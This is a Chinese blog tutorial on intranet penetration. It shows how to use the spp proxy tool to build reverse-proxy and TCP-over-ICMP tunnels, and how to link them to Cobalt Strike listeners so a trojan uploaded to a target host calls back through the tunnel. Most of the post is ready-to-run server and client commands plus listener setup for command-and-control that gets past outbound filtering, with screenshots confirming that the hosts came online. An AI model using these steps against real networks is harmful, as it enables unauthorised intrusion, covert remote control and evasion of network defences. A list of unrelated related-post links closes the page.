内网渗透-隧道搭建&ssp隧道代理工具

内网渗透-隧道搭建&ssp隧道代理工具

目录

txt 复制代码
内网穿透:解决网络控制上线&网络通讯问题 
隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网) 
代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)

spp隧道代理工具

txt 复制代码
支持的协议:
TCP、UDP、RUDP(可靠 UDP)、RICMP(可靠 ICMP)、RHTTP(可靠 HTTP)、KCP、Quic
支持类型:
正向代理、反向代理、SOCKS5正向代理、SOCKS5反向代理
协议和类型可以自由组合
外部代理协议和内部转发协议可以自由组合

spp工作原理图

txt 复制代码
spp详解以及下载地址:
https://github.com/esrrhs/spp/tree/0.6

cs上线主机

spp代理通信

本工具使用简单,服务器、客户机各一条命令,就可建立连接。

服务端配置
shell 复制代码
chmod +x spp  ##添加执行权限
./spp -type server -proto tcp -listen :8888 ##启动spp,并设置为服务端,通信协议为tcp,监控本地的8888端口。
客户端配置
shell 复制代码
chmod +x spp  ##添加执行权限
./spp -name "sx" -type reverse_proxy_client -server 服务器ip地址:8888 -fromaddr :7777 -toaddr :6666 -proxyproto tcp   ## 设置一个名字(自定义即可),连接服务器的IP地址及端口,将服务器的端口7777映射到本地的端口6666上,设置通信协议为tcp。

服务端可进行查看连接状态

CS配置

CS需要设置两个监听器,一个用于生成木马,一个用于接收反弹shell。

设置CS生成木马的监听器

此监听器IP地址要设置为服务端的IP地址,端口为刚才设置的7777端口,相当于木马执行后,会去访问服务端的7777端,而之前的设置就是将服务端的7777端口信息转发到本地6666端口。

配置CS监听上线的监听器

接受上线主机的监听器(shell)。

生成木马

将木马上传到目标主机当中,执行即可。

成功上线

spp服务端代理状态:

spp隧道搭建

若目标主机的出网TCP被禁止,但是ICMP协议是能够通信的,所以通过SPP将目标主机上的TCP流量伪装为ICMP协议转发给服务端。

服务端配置

这里设置监听的是icmp协议。

shell 复制代码
./spp -type server -proto ricmp -listen 0.0.0.0  ##这里设置监听ICMP协议,全端口
客户端配置

客户端配置需要在目标主机上进行执行此命令,将本地的TCP伪装为ICMP所以需要转发本地的端口。

shell 复制代码
spp -name "sx" -type proxy_client -server 服务器IP -fromaddr :7777 -toaddr :6666 -proxyproto tcp -proto ricmp

服务端状态,成功建立隧道

CS配置

CS需要设置两个监听器,一个用于生成木马,一个用于接收反弹shell。

txt 复制代码
这生成本地的7777端口,因为客户端上已经设置了将7777端口转发了。

生成另一个监听器,监听本地的IP地址的6666端口即可。

监听器状态:

生成木马,执行上线。

选择本地监听器,生成木马即可。

将木马上传到目标机器,执行木马

执行木马,成功上线

spp客户端状态。并抓取流量分析,为icmp流量,伪装成功。

ICMP流量

spp隧道代理工具还可以伪装其他协议,具体详解见spp代理

文章不妥之处,欢迎批评指正!

相关推荐
iOS技术狂热者1 小时前
Flutter 音视频播放器与弹幕系统开发实践
websocket·网络协议·tcp/ip·http·网络安全·https·udp
予安灵2 小时前
XSS 攻击(详细)
前端·web安全·网络安全·网络攻击模型·xss·安全架构·xss攻击
网络抓包与爬虫4 小时前
flutter WEB端启动优化(加载速度,加载动画)
websocket·网络协议·tcp/ip·http·网络安全·https·udp
网络抓包与爬虫4 小时前
从头开发一个Flutter插件(二)高德地图定位插件
websocket·网络协议·tcp/ip·http·网络安全·https·udp
色的归属感5 小时前
一款功能强大的手机使用情况监控工具
websocket·网络协议·tcp/ip·http·网络安全·https·udp
iOS技术狂热者5 小时前
【Android开发基础】手机传感器信息的获取
websocket·网络协议·tcp/ip·http·网络安全·https·udp
it技术分享just_free5 小时前
软考教材重点内容 信息安全工程师 第21章 网络设备安全
web安全·网络安全·信息安全·系统安全·软考
swift开发pk OC开发12 小时前
如何轻松查看安卓手机内存,让手机更流畅
websocket·网络协议·tcp/ip·http·网络安全·https·udp
swift开发pk OC开发13 小时前
flutter框架中文文档,android智能手机编程答案
websocket·网络协议·tcp/ip·http·网络安全·https·udp
go_to_hacker16 小时前
AI进行全自动渗透
网络·web安全·网络安全·渗透测试·代码审计